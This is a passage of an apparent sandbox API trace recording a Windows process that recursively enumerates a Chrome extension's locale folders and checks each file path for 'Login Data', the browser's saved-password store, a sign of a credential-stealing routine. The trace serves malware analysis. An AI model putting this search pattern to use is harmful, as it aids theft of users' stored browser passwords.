lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.634] lstrlenW (lpString="vi") returned 2 [0161.634] GetProcessHeap () returned 0x8e0000 [0161.634] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.634] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" [0161.634] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.635] GetProcessHeap () returned 0x8e0000 [0161.635] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.635] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 137 [0161.635] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 137 [0161.635] lstrlenW (lpString="\\*.*") returned 4 [0161.635] GetProcessHeap () returned 0x8e0000 [0161.635] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" [0161.635] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*.*" [0161.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.641] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.641] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.641] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.641] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 137 [0161.641] lstrlenW (lpString="\\") returned 1 [0161.641] GetProcessHeap () returned 0x8e0000 [0161.641] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" [0161.641] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\" [0161.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\") returned 138 [0161.641] lstrlenW (lpString="messages.json") returned 13 [0161.641] GetProcessHeap () returned 0x8e0000 [0161.641] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\" [0161.641] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" [0161.641] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.641] GetProcessHeap () returned 0x8e0000 [0161.641] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.641] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.641] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.641] GetProcessHeap () returned 0x8e0000 [0161.641] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.641] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.641] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.642] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.642] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.642] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0161.642] lstrcmpiW (lpString1="zh_CN", lpString2=".") returned 1 [0161.642] lstrcmpiW (lpString1="zh_CN", lpString2="..") returned 1 [0161.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.642] lstrlenW (lpString="\\") returned 1 [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.642] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.642] lstrlenW (lpString="zh_CN") returned 5 [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.642] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" [0161.642] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 140 [0161.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 140 [0161.642] lstrlenW (lpString="\\*.*") returned 4 [0161.642] GetProcessHeap () returned 0x8e0000 [0161.642] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" [0161.642] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*.*" [0161.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.643] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.643] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.643] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.643] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 140 [0161.643] lstrlenW (lpString="\\") returned 1 [0161.643] GetProcessHeap () returned 0x8e0000 [0161.643] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" [0161.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\" [0161.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\") returned 141 [0161.643] lstrlenW (lpString="messages.json") returned 13 [0161.643] GetProcessHeap () returned 0x8e0000 [0161.643] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\" [0161.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" [0161.643] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.643] GetProcessHeap () returned 0x8e0000 [0161.643] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.643] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0161.643] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.643] GetProcessHeap () returned 0x8e0000 [0161.643] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.643] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.643] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.644] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 